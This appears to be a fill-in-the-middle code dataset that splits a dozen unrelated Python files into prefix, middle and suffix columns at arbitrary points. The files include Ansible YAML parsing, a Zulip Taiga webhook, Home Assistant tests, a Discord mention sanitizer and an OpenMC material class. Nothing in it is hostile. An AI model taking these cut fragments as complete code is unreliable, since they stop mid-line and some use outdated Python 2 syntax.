prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
import sys
from services.spawn import MobileTemplate
from services.spawn import WeaponTemplate
from resources.datatables import WeaponType
from resources.datatables import Difficulty
from resources.datatables import Options
from resources.datatables import FactionStatus
from java.util import Vector
def addTemplate(core):
mobileTemplate = MobileTemplate()
mobileTemplate.setCreatureName('rebel_battle_droid')
mobileTemplate.setLevel(83)
mobileTemplate.setDifficulty(Difficulty.ELITE)
mobileTemplate.setMinSpawnDistance(4)
mobileTemplate.setMaxSpawnDistance(8)
mobileTemplate.setDeathblow(True)
mobileTemplate.setScale(1)
mobileTemplate.setSocialGroup("rebel")
mobileTemplate.setAssistRange(24)
mobileTemplate.setStalker(False)
mobileTemplate.setFaction("rebel")
mobileTemplate.setFactionStatus(FactionStatus.Combatant)
templates = Vector( | )
templates.add('object/mobile/shared_battle_droid.iff')
mobileTemplate.setTemplates(templates)
weaponTemplates = Vector()
weapontemplate = WeaponTemplate('object/weapon/ranged/carbine/shared_carbine_e5.iff', WeaponType.CARBINE, 1.0, 15, 'energy')
weaponTemplates.add(weapontemplate)
mobileTemplate.setWeaponTemplateVector(wea | ponTemplates)
attacks = Vector()
mobileTemplate.setDefaultAttack('rangedShot')
mobileTemplate.setAttacks(attacks)
core.spawnService.addMobileTemplate('battle_droid_rebel', mobileTemplate)
return |
raise errors.AnsibleError("expected current_args to be a basestring")
# we use parse_kv to split up the current args into a dictionary
final_args = parse_kv(current_a | rgs)
if isinstance(new_args, dict):
final_args.update(new_args)
elif isinstance(new_args, basestring):
new_args_kv = parse_kv( | new_args)
final_args.update(new_args_kv)
return serialize_args(final_args)
def parse_yaml(data, path_hint=None):
''' convert a yaml string to a data structure. Also supports JSON, ssssssh!!!'''
stripped_data = data.lstrip()
loaded = None
if stripped_data.startswith("{") or stripped_data.startswith("["):
# since the line starts with { or [ we can infer this is a JSON document.
try:
loaded = json.loads(data)
except ValueError, ve:
if path_hint:
raise errors.AnsibleError(path_hint + ": " + str(ve))
else:
raise errors.AnsibleError(str(ve))
else:
# else this is pretty sure to be a YAML document
loaded = yaml.load(data, Loader=Loader)
return loaded
def process_common_errors(msg, probline, column):
replaced = probline.replace(" ","")
if ":{{" in replaced and "}}" in replaced:
msg = msg + """
This one looks easy to fix. YAML thought it was looking for the start of a
hash/dictionary and was confused to see a second "{". Most likely this was
meant to be an ansible template evaluation instead, so we have to give the
parser a small hint that we wanted a string instead. The solution here is to
just quote the entire value.
For instance, if the original line was:
app_path: {{ base_path }}/foo
It should be written as:
app_path: "{{ base_path }}/foo"
"""
return msg
elif len(probline) and len(probline) > 1 and len(probline) > column and probline[column] == ":" and probline.count(':') > 1:
msg = msg + """
This one looks easy to fix. There seems to be an extra unquoted colon in the line
and this is confusing the parser. It was only expecting to find one free
colon. The solution is just add some quotes around the colon, or quote the
entire line after the first colon.
For instance, if the original line was:
copy: src=file.txt dest=/path/filename:with_colon.txt
It can be written as:
copy: src=file.txt dest='/path/filename:with_colon.txt'
Or:
copy: 'src=file.txt dest=/path/filename:with_colon.txt'
"""
return msg
else:
parts = probline.split(":")
if len(parts) > 1:
middle = parts[1].strip()
match = False
unbalanced = False
if middle.startswith("'") and not middle.endswith("'"):
match = True
elif middle.startswith('"') and not middle.endswith('"'):
match = True
if len(middle) > 0 and middle[0] in [ '"', "'" ] and middle[-1] in [ '"', "'" ] and probline.count("'") > 2 or probline.count('"') > 2:
unbalanced = True
if match:
msg = msg + """
This one looks easy to fix. It seems that there is a value started
with a quote, and the YAML parser is expecting to see the line ended
with the same kind of quote. For instance:
when: "ok" in result.stdout
Could be written as:
when: '"ok" in result.stdout'
or equivalently:
when: "'ok' in result.stdout"
"""
return msg
if unbalanced:
msg = msg + """
We could be wrong, but this one looks like it might be an issue with
unbalanced quotes. If starting a value with a quote, make sure the
line ends with the same set of quotes. For instance this arbitrary
example:
foo: "bad" "wolf"
Could be written as:
foo: '"bad" "wolf"'
"""
return msg
return msg
def process_yaml_error(exc, data, path=None, show_content=True):
if hasattr(exc, 'problem_mark'):
mark = exc.problem_mark
if show_content:
if mark.line -1 >= 0:
before_probline = data.split("\n")[mark.line-1]
else:
before_probline = ''
probline = data.split("\n")[mark.line]
arrow = " " * mark.column + "^"
msg = """Syntax Error while loading YAML script, %s
Note: The error may actually appear before this position: line %s, column %s
%s
%s
%s""" % (path, mark.line + 1, mark.column + 1, before_probline, probline, arrow)
unquoted_var = None
if '{{' in probline and '}}' in probline:
if '"{{' not in probline or "'{{" not in probline:
unquoted_var = True
if not unquoted_var:
msg = process_common_errors(msg, probline, mark.column)
else:
msg = msg + """
We could be wrong, but this one looks like it might be an issue with
missing quotes. Always quote template expression brackets when they
start a value. For instance:
with_items:
- {{ foo }}
Should be written as:
with_items:
- "{{ foo }}"
"""
else:
# most likely displaying a file with sensitive content,
# so don't show any of the actual lines of yaml just the
# line number itself
msg = """Syntax error while loading YAML script, %s
The error appears to have been on line %s, column %s, but may actually
be before there depending on the exact syntax problem.
""" % (path, mark.line + 1, mark.column + 1)
else:
# No problem markers means we have to throw a generic
# "stuff messed up" type message. Sry bud.
if path:
msg = "Could not parse YAML. Check over %s again." % path
else:
msg = "Could not parse YAML."
raise errors.AnsibleYAMLValidationFailed(msg)
def parse_yaml_from_file(path, vault_password=None):
''' convert a yaml file to a data structure '''
data = None
show_content = True
try:
data = open(path).read()
except IOError:
raise errors.AnsibleError("file could not read: %s" % path)
vault = VaultLib(password=vault_password)
if vault.is_encrypted(data):
# if the file is encrypted and no password was specified,
# the decrypt call would throw an error, but we check first
# since the decrypt function doesn't know the file name
if vault_password is None:
raise errors.AnsibleError("A vault password must be specified to decrypt %s" % path)
data = vault.decrypt(data)
show_content = False
if re.match("#!.*python", data):
result = pybook.run_pybook(path)
else:
try:
result = parse_yaml(data, path_hint=path)
except yaml.YAMLError, exc:
process_yaml_error(exc, data, path, show_content)
if VERBOSITY >= 3:
display("""Structure of file "%s":\n%s\n""" % (path, pprint.pformat(result)), color='yellow')
return result
def parse_kv(args):
''' convert a string of key/value items to a dict '''
options = {}
if args is not None:
try:
vargs = split_args(args)
except ValueError, ve:
if 'no closing quotation' in str(ve).lower():
raise errors.AnsibleError("error parsing argument string, try quoting the entire line.")
else:
raise
for x in vargs:
if "=" in x:
k, v = x.split("=",1)
options[k.strip()] = unquote(v.strip())
return options
def _validate_both_dicts(a, b):
if not (isinstance(a, dict) and isinstance(b, dict)):
raise errors.AnsibleError(
"failed to combine variables, expected dicts but got a '%s' and a '%s'" % (type(a).__name__, type(b).__name__)
)
def merge_hash(a, b):
''' recursively merges hash b into a
keys from b take precedence over keys from a '''
result = {}
# we check here as well as in combine_vars() since this
# function can work recursively with nested dicts
_validate_both_dicts(a, b)
for dicts in a, b:
# next, iterate over b keys and values
for k, v in dicts.i |
er events connected to milestones
- :clipboard: - all other events connected to tasks
- :bulb: - all other events connected to issues
*Text formatting*: if there has been a change of a property, the new value should always be in bold; otherwise the
subject of US/task should be in bold.
"""
from __future__ import absolute_import
from typing import Any, Mapping, Optional, Tuple, Text
from django.utils.translation import ugettext as _
from django.http import HttpRequest, HttpResponse
from zerver.lib.actions import check_send_message
from zerver.lib.response import json_success, json_error
from zerver.decorator import REQ, has_request_variables, api_key_only_webhook_view
from zerver.models import UserProfile, Client
import ujson
from six.moves import range
@api_key_only_webhook_view('Taiga')
@has_request_variables
def api_taiga_webhook(request, user_profile, client, message=REQ(argument_type='body'),
stream=REQ(default='taiga'), topic=REQ(default='General')):
# type: (HttpRequest, UserProfile, Client, Dict[str, Any], Text, Text) -> HttpResponse
parsed_events = parse_message(message)
content_lines = []
for event in parsed_events:
content_lines.append(generate_content(event) + '\n')
content = "".join(sorted(content_lines))
check_send_message(user_profile, client, 'stream', [stream], topic, content)
return json_success()
templates = {
'userstory': {
'create': u':package: %(user)s created user story **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned user story **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned user story **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned user story **%(subject)s**'
' from %(old)s to %(new)s.',
'points': u':game_die: %(user)s changed estimation of user story **%(subject)s**.',
'blocked': u':lock: %(user)s blocked user story **%(subject)s**.',
'unblocked': u':unlock: %(user)s unblocked user story **%(sub | ject)s**.',
'set_milestone': u':calendar: %(user)s added user story **%(subject)s** to sprint %(new)s.',
'unset_milestone': u':calendar: %(user)s removed user story **%(subject)s** fro | m sprint %(old)s.',
'changed_milestone': u':calendar: %(user)s changed sprint of user story **%(subject)s** from %(old)s'
' to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of user story **%(subject)s**'
' from %(old)s to %(new)s.',
'closed': u':checkered_flag: %(user)s closed user story **%(subject)s**.',
'reopened': u':package: %(user)s reopened user story **%(subject)s**.',
'renamed': u':notebook: %(user)s renamed user story from %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of user story **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on user story **%(subject)s**.',
'delete': u':x: %(user)s deleted user story **%(subject)s**.'
},
'milestone': {
'create': u':calendar: %(user)s created sprint **%(subject)s**.',
'renamed': u':notebook: %(user)s renamed sprint from %(old)s to **%(new)s**.',
'estimated_start': u':calendar: %(user)s changed estimated start of sprint **%(subject)s**'
' from %(old)s to %(new)s.',
'estimated_finish': u':calendar: %(user)s changed estimated finish of sprint **%(subject)s**'
' from %(old)s to %(new)s.',
'delete': u':x: %(user)s deleted sprint **%(subject)s**.'
},
'task': {
'create': u':clipboard: %(user)s created task **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned task **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned task **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned task **%(subject)s**'
' from %(old)s to %(new)s.',
'blocked': u':lock: %(user)s blocked task **%(subject)s**.',
'unblocked': u':unlock: %(user)s unblocked task **%(subject)s**.',
'set_milestone': u':calendar: %(user)s added task **%(subject)s** to sprint %(new)s.',
'changed_milestone': u':calendar: %(user)s changed sprint of task **%(subject)s** from %(old)s to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of task **%(subject)s**'
' from %(old)s to %(new)s.',
'renamed': u':notebook: %(user)s renamed task %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of task **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on task **%(subject)s**.',
'delete': u':x: %(user)s deleted task **%(subject)s**.',
'changed_us': u':clipboard: %(user)s moved task **%(subject)s** from user story %(old)s to %(new)s.'
},
'issue': {
'create': u':bulb: %(user)s created issue **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned issue **%(subject)s** to %(new)s.', #
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned issue **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned issue **%(subject)s**'
' from %(old)s to %(new)s.',
'changed_priority': u':rocket: %(user)s changed priority of issue **%(subject)s** from %(old)s to %(new)s.',
'changed_severity': u':warning: %(user)s changed severity of issue **%(subject)s** from %(old)s to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of issue **%(subject)s**'
' from %(old)s to %(new)s.',
'changed_type': u':bulb: %(user)s changed type of issue **%(subject)s** from %(old)s to %(new)s.',
'renamed': u':notebook: %(user)s renamed issue %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of issue **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on issue **%(subject)s**.',
'delete': u':x: %(user)s deleted issue **%(subject)s**.'
},
}
def get_old_and_new_values(change_type, message):
# type: (str, Mapping[str, Any]) -> Tuple[Optional[Dict[str, Any]], Optional[Dict[str, Any]]]
""" Parses the payload and finds previous and current value of change_type."""
if change_type in ['subject', 'name', 'estimated_finish', 'estimated_start']:
old = message["change"]["diff"][change_type]["from"]
new = message["change"]["diff"][change_type]["to"]
return old, new
try:
old = message["change"]["diff"][change_type]["from"]
except KeyError:
old = None
try:
new = message["change"]["diff"][change_type]["to"]
except KeyError:
new = None
return old, new
def parse_comment(message):
# type: (Mapping[str, Any]) -> Dict[str, Any]
""" Parses the comment to issue, task or US. """
return {
'event': 'commented',
'type': message["type"],
'values': {
'user': get_owner_name(message),
'subject': get_subject(message)
}
}
def parse_create_or_delete(message):
# type: (Mapping[str, Any]) -> Dict[str, Any]
""" Parses create or delete event. """
return {
'type': message["type"],
'event': message["action"],
'values':
{
'user': get_owner_name(message),
'subject': get_subject(message)
}
}
def parse_change_event(change_type, message):
# type: (str, Mapping[str, Any]) -> Dict[str, Any]
""" Parses change event. """
evt = {} # type: Dict[str, Any]
values = {
'user': get_owner_name(message),
'subject': get_subject(message)
} # type: Dict[str, Any]
if change_type in ["description_diff", "points"]:
event_type = change_type
elif change_type in ["milestone", "assigned_to"]:
old, new = get_old_and_new_values(change_ |
from __future__ import absolute_import
from __future__ import unicode_literals
NAMES = [
'grey',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'white'
]
def get_pairs():
for i, name in enumerate(NAMES):
yield(name, str(30 + i))
yield('intense_' + name, str(30 + i) + ';1')
def ansi(code):
return '\033[{0}m'.format(code)
def ansi_color(code, s):
return '{0}{1}{2}'.format(ansi(code), s, ansi(0))
def make_color_fn(code):
return lambda s: ansi_color(code, s)
|
for (name, code) in get_pairs():
globals()[name] = make_color_fn(code)
def rainbow():
cs = ['cyan', 'yellow', 'green', 'magenta', 'red', 'blue',
| 'intense_cyan', 'intense_yellow', 'intense_green',
'intense_magenta', 'intense_red', 'intense_blue']
for c in cs:
yield globals()[c]
|
ses for Omnivor input file
Copyright (C) 2013 DTU Wind Energy
Author: Emmanuel Branlard
Email: ebra@dtu.dk
Last revision: 25/11/2013
Namelist IO: badis functions to read and parse a fortran file into python dictonary and write it back to a file
The parser was adapted from: fortran-namelist on code.google with the following info:
__author__ = 'Stephane Chamberland (stephane.chamberland@ec.gc.ca)'
__version__ = '$Revision: 1.0 $'[11:-2]
__date__ = '$Date: 2006/09/05 21:16:24 $'
__copyright__ = 'Copyright (c) 2006 RPN'
__license__ = 'LGPL'
Recognizes files of the form:
&namelistname
opt1 = value1
...
/
"""
from __future__ import print_function
from we_file_io import WEFileIO, TestWEFileIO
import unittest
import numpy as np
import os.path as path
import sys
import re
import tempfile
import os
__author__ = 'E. Branlard '
class FortranNamelistIO(WEFileIO):
"""
Fortran Namelist IO class
Scan a Fortran Namelist file and put Section/Parameters into a dictionary
Write the file back if needed.
"""
def _write(self):
""" Write a file (overrided)
"""
with open(self.filename, 'w') as f:
for nml in self.data :
f.write('&'+nml+'\n')
# Sorting dictionary data (in the same order as it was created, thanks to id)
SortedList = sorted(self.data[nml].items(), key=lambda(k, v): v['id'])
# for param in self.data[nml]:
for param in map(lambda(k,v):k,SortedList):
f.write(param+'='+','.join(self.data[nml][param]['val']))
if len(self.data[nml][param]['com']) >0:
f.write(' !'+self.data[nml][param]['com'])
f.write('\n')
f.write('/\n')
def _read(self):
""" Read the file (overrided)
"""
with open(self.filename, 'r') as f:
data = f.read()
varname = r'\b[a-zA-Z][a-zA-Z0-9_]*\b'
valueInt = re.compile(r'[+-]?[0-9]+')
valueReal = re.compile(r'[+-]?([0-9]+\.[0-9]*|[0-9]*\.[0-9]+)')
valueNumber = re.compile(r'\b(([\+\-] | ?[0-9]+)?\.)?[0-9]*([eE][-+]?[0-9]+)?')
valueBool = re.compile(r"(\.(true|false|t|f)\.)",re.I)
valueTrue = re.compile(r"(\.(true|t)\.)",re.I)
spaces = r'[ | \s\t]*'
quote = re.compile(r"[\s\t]*[\'\"]")
namelistname = re.compile(r"^[\s\t]*&(" + varname + r")[\s\t]*$")
paramname = re.compile(r"[\s\t]*(" + varname+r')[\s\t]*=[\s\t]*')
namlistend = re.compile(r"^" + spaces + r"/" + spaces + r"$")
#split sections/namelists
mynmlfile = {}
mynmlfileRaw = {}
mynmlname = ''
for item in FortranNamelistIO.clean(data.split("\n"),cleancomma=1):
if re.match(namelistname,item):
mynmlname = re.sub(namelistname,r"\1",item)
mynmlfile[mynmlname] = {}
mynmlfileRaw[mynmlname] = []
elif re.match(namlistend,item):
mynmlname = ''
else:
if mynmlname:
mynmlfileRaw[mynmlname].append(item)
#parse param in each section/namelist
for mynmlname in mynmlfile.keys():
#split strings
bb = []
for item in mynmlfileRaw[mynmlname]:
if item[0]!='!':
# discarding lines that starts with a comment
bb.extend(FortranNamelistIO.splitstring(item))
#split comma and =
aa = []
for item in bb:
if not re.match(quote,item):
aa.extend(re.sub(r"[\s\t]*=",r" =\n",re.sub(r",+",r"\n",item)).split("\n"))
# aa.extend(re.sub(r"[\s\t]*=",r" =\n",item).split("\n"))
else:
aa.append(item)
del(bb)
aa = FortranNamelistIO.clean(aa,cleancomma=1)
myparname = ''
id_cum=0
for item in aa:
if re.search(paramname,item):
#myparname = re.sub(paramname,r"\1",item).lower() ! NO MORE LOWER CASE
myparname = re.sub(paramname,r"\1",item)
id_cum=id_cum+1
mynmlfile[mynmlname][myparname] = {
'val' : [],
'id' : id_cum,
'com' : ''
}
elif paramname:
# Storing comments
item2=item.split('!')
item=item2[0]
if len(item) > 1 :
mynmlfile[mynmlname][myparname]['com']=''.join(item2[1:])
if re.match(valueBool,item):
if re.match(valueTrue,item):
mynmlfile[mynmlname][myparname]['val'].append('.true.')
else:
mynmlfile[mynmlname][myparname]['val'].append('.false.')
else:
# item2=re.sub(r"(^[\'\"]|[\'\"]$)",r"",item.strip())
mynmlfile[mynmlname][myparname]['val'].append(item.strip())
self.data=mynmlfile
# Accessor and mutator dictionary style
def __getitem__(self, key):
""" Transform the class instance into a dictionary."""
return self.data[key]
def __setitem__(self, key, value):
""" Transform the class instance into a dictionary."""
self.data[key] = value
#==== Helper functions for Parsing of files
@staticmethod
def clean(mystringlist,commentexpr=r"^[\s\t]*\#.*$",spacemerge=0,cleancomma=0):
"""
Remove leading and trailing blanks, comments/empty lines from a list of strings
mystringlist = foo.clean(mystringlist,spacemerge=0,commentline=r"^[\s\t]*\#",cleancharlist="")
commentline: definition of commentline
spacemerge: if <>0, merge/collapse multi space
cleancomma: Remove leading and trailing commas
"""
aa = mystringlist
if cleancomma:
aa = [re.sub("(^([\s\t]*\,)+)|((\,[\s\t]*)+$)","",item).strip() for item in aa]
if commentexpr:
aa = [re.sub(commentexpr,"",item).strip() for item in aa]
if spacemerge:
aa = [re.sub("[\s\t]+"," ",item).strip() for item in aa if len(item.strip()) <> 0]
else:
aa = [item.strip() for item in aa if len(item.strip()) <> 0]
return aa
@staticmethod
def splitstring(mystr):
"""
Split a string in a list of strings at quote boundaries
Input: String
Output: list of strings
"""
dquote=r'(^[^\"\']*)(\"[^"]*\")(.*)$'
squote=r"(^[^\"\']*)(\'[^']*\')(.*$)"
mystrarr = re.sub(dquote,r"\1\n\2\n\3",re.sub(squote,r"\1\n\2\n\3",mystr)).split("\n")
#remove zerolenght items
mystrarr = [item for item in mystrarr if len(item) <> 0]
if len(mystrarr) > 1:
mystrarr2 = []
for item in mystrarr:
mystrarr2.extend(FortranNamelistIO.splitstring(item))
mystrarr = mystrarr2
return mystrarr
## Do Some testing -------------------------------------------------------
class TestFortranNamelist(TestWEFileIO):
""" Test class for MyFileType class """
test_file = './test/fortran/fortran_namelist.nml'
def test_output_identical(self):
InputFile=FortranNamelistIO(self.test_file)
test_fileout=tempfile.mkstemp()[1]
InputFile.write(test_fileout)
with open(self.test_file, 'r') as f:
data_expected = f.read()
with open(test_fileout, 'r') as f:
data_read = f.read()
try:
self.assertMultiLineEqual(data_read, data_expected)
finally:
os.remove(test_fileout)
def test_duplication(self):
self._test_duplication(FortranNamelistIO, self.test_file)
## Main function ---------------------------------------------------------
if __name__ == '__main_ |
"""Test the National Weather Service (NWS) config flow."""
from unittest.mock import patch
import aiohttp
from homeassistant import config_entries
from homeassistant.components.nws.const import DOMAIN
async def test_form(hass, mock_simple_nws_config):
"""Test we get the form."""
hass.config.latitude = 35
hass.config.longitude = -90
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"], {"api_key": "test"}
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "ABC"
assert result2["data"] == {
"api_key": "test",
"latitude": 35,
"longitude": -90,
"station": "ABC",
}
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_cannot_connect(hass, mock_simple_ | nws_config):
"""Test we handle cannot connect error."""
mock_instance = mock_simple_nws_config.return_value
mock_instance.set_station.side_effect = aiohttp.ClientError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
result2 = await | hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "cannot_connect"}
async def test_form_unknown_error(hass, mock_simple_nws_config):
"""Test we handle unknown error."""
mock_instance = mock_simple_nws_config.return_value
mock_instance.set_station.side_effect = ValueError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_form_already_configured(hass, mock_simple_nws_config):
"""Test we handle duplicate entries."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert len(mock_setup_entry.mock_calls) == 1
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "abort"
assert result2["reason"] == "already_configured"
await hass.async_block_till_done()
assert len(mock_setup_entry.mock_calls) == 0
|
def f(x=2):
return x
lis = [1]
dic = {
"x": 2
}
f(1) # call_function
f(*lis) # call_function_var
f(**dic) # call_function_kw
f(*[], **dic) # call_function_var_kw
class C(object): # call_function
def __enter__(self):
x = 1
return x
def __exit__(self, *args, **kwargs):
pass
def fn_dec(*args):
def dec(fn):
return fn
return dec
dec | 1 = fn_dec("1")
@fn_dec("2") # call_function
@dec1 # call_function
def fw(x):
return x
@fn_dec("2" | ) # call_function
@dec1 # call_function
class D(object):
pass
[a for a in lis] # nothing
{a for a in lis} # call_function
{a: a for a in lis} # call_function
f(a for a in lis) # call_function gen, call_function
with C() as r: # WITH_CLEANUP
pass
assert True # nothing
assert True, "wat" # call_function
|
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additi | onal information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to | in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/getAccuracy.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def getAccuracy(y: Matrix,
yhat: Matrix,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
params_dict = {'y': y, 'yhat': yhat}
params_dict.update(kwargs)
return Matrix(y.sds_context,
'getAccuracy',
named_input_nodes=params_dict)
|
"""Provides some useful utilities for the Discord bot, mostly to do with cleaning."""
import re
import discord
__all__ = ['clean', 'is_clean']
mass_mention = re.compile('@(everyone|here)')
member_mention = re.compile(r'<@\!?(\d+)>')
role_mention = re.compile(r'<@&(\d+)>')
channel_mention = re.compile(r'<#(\d+)>')
def clean(ctx, text=None, | *, mass=True, member=True, role=True, channel=True):
"""Cleans the message of anything specified in the parameters passed."""
if text is None:
text = ctx.message.content
if ma | ss:
cleaned_text = mass_mention.sub(lambda match: '@\N{ZERO WIDTH SPACE}' + match.group(1), text)
if member:
cleaned_text = member_mention.sub(lambda match: clean_member_name(ctx, int(match.group(1))), cleaned_text)
if role:
cleaned_text = role_mention.sub(lambda match: clean_role_name(ctx, int(match.group(1))), cleaned_text)
if channel:
cleaned_text = channel_mention.sub(lambda match: clean_channel_name(ctx, int(match.group(1))), cleaned_text)
return cleaned_text
def is_clean(ctx, text=None):
"""Checks if the message is clean already and doesn't need to be cleaned."""
if text is None:
text = ctx.message.content
return all(regex.search(text) is None for regex in (mass_mention, member_mention, role_mention, channel_mention))
def clean_member_name(ctx, member_id):
"""Cleans a member's name from the message."""
member = ctx.guild.get_member(member_id)
if member is None:
return '<@\N{ZERO WIDTH SPACE}%d>' % member_id
elif is_clean(ctx, member.display_name):
return member.display_name
elif is_clean(ctx, str(member)):
return str(member)
else:
return '<@\N{ZERO WIDTH SPACE}%d>' % member.id
def clean_role_name(ctx, role_id):
"""Cleans role pings from messages."""
role = discord.utils.get(ctx.guild.roles, id=role_id) # Guild.get_role doesn't exist
if role is None:
return '<@&\N{ZERO WIDTH SPACE}%d>' % role_id
elif is_clean(ctx, role.name):
return '@' + role.name
else:
return '<@&\N{ZERO WIDTH SPACE}%d>' % role.id
def clean_channel_name(ctx, channel_id):
"""Cleans channel mentions from messages."""
channel = ctx.guild.get_channel(channel_id)
if channel is None:
return '<#\N{ZERO WIDTH SPACE}%d>' % channel_id
elif is_clean(ctx, channel.name):
return '#' + channel.name
else:
return '<#\N{ZERO WIDTH SPACE}%d>' % channel.id
def pretty_concat(strings, single_suffix='', multi_suffix=''):
"""Concatenates things in a pretty way"""
if len(strings) == 1:
return strings[0] + single_suffix
elif len(strings) == 2:
return '{} and {}{}'.format(*strings, multi_suffix)
else:
return '{}, and {}{}'.format(', '.join(strings[:-1]), strings[-1], multi_suffix)
|
from lib.base import BaseJiraAction
__all__ = [
'Transiti | onJiraIssueAction'
]
class TransitionJiraIssueAction(BaseJiraAction):
def run(self, issue_key, transition):
resul | t = self._client.transition_issue(issue_key, transition)
return result
|
## Need to fin | d a libr | ary |
# Copyright (c) 2007, Simon Edwards <simon@simonzone.com>
# Copyright (c) 2014, Raphael Kubo da Costa <rakuco@FreeBSD.org>
# Redistribution and use is allowed according to the terms of the BSD license.
# For details see the accompanying COPYING-CMAKE-SCRIPTS file.
import PyQt4.QtCore
import os
import sys
def get_default_sip_dir():
# This is based on QScintilla's configure.py, and only works for the
# default case where installation paths have not been changed in PyQt's
# configuration process.
if sys.platform == 'win32':
pyqt_sip_dir = os.path.join(sys.prefix, 'sip', 'PyQt4')
else:
pyqt_sip_dir = os.path.join(sys.prefix, 'share', 'sip', 'PyQt4')
return pyqt_sip_dir
def get_qt4_tag(sip_flags):
in_t = False
for item in sip_flags.split(' '):
if item == '-t':
in_t | = True
elif in_t:
if item.startswith('Qt_4'):
return item
else:
in_t = False
raise ValueError('Cannot find Qt\'s tag in PyQt4\'s SIP flags.')
if __name__ == '__main__':
try:
import PyQt4.pyqtconfig
pyqtcfg = PyQt4.pyqtconfig.Configuration()
sip_dir = pyqtcfg.pyqt_sip_dir
sip_flags = py | qtcfg.pyqt_sip_flags
except ImportError:
# PyQt4 >= 4.10.0 was built with configure-ng.py instead of
# configure.py, so pyqtconfig.py is not installed.
sip_dir = get_default_sip_dir()
sip_flags = PyQt4.QtCore.PYQT_CONFIGURATION['sip_flags']
print('pyqt_version:%06.x' % PyQt4.QtCore.PYQT_VERSION)
print('pyqt_version_str:%s' % PyQt4.QtCore.PYQT_VERSION_STR)
print('pyqt_version_tag:%s' % get_qt4_tag(sip_flags))
print('pyqt_sip_dir:%s' % sip_dir)
print('pyqt_sip_flags:%s' % sip_flags)
|
py import deepcopy
from numbers import Real, Integral
import warnings
from xml.etree import ElementTree as ET
import sys
if sys.version_info[0] >= 3:
basestring = str
import openmc
from openmc.checkvalue import check_type, check_value, check_greater_than
from openmc.clean_xml import *
# A list of all IDs for all Materials created
MATERIAL_IDS = []
# A static variable for auto-generated Material IDs
AUTO_MATERIAL_ID = 10000
def reset_auto_material_id():
global AUTO_MATERIAL_ID, MATERIAL_IDS
AUTO_MATERIAL_ID = 10000
MATERIAL_IDS = []
# Units for density supported by OpenMC
DENSITY_UNITS = ['g/cm3', 'g/cc', 'kg/cm3', 'at/b-cm', 'at/cm3', 'sum']
# Constant for density when not needed
NO_DENSITY = 99999.
class Material(object):
"""A material composed of a collection of nuclides/elements that can be assigned
to a region of space.
Parameters
----------
material_id : int, optional
Unique identifier for the material. If not specified, an identifier will
automatically be assigned.
name : str, optional
Name of the material. If not specified, the name will be the empty
string.
Attributes
----------
id : int
Unique identifier for the material
density : float
Density of the material (units defined separately)
density_units : str
Units used for `density`. Can be one of 'g/cm3', 'g/cc', 'kg/cm3',
'atom/b-cm', 'atom/cm3', or 'sum'.
"""
def __init__(self, material_id=None, name=''):
# Initialize class attributes
self.id = material_id
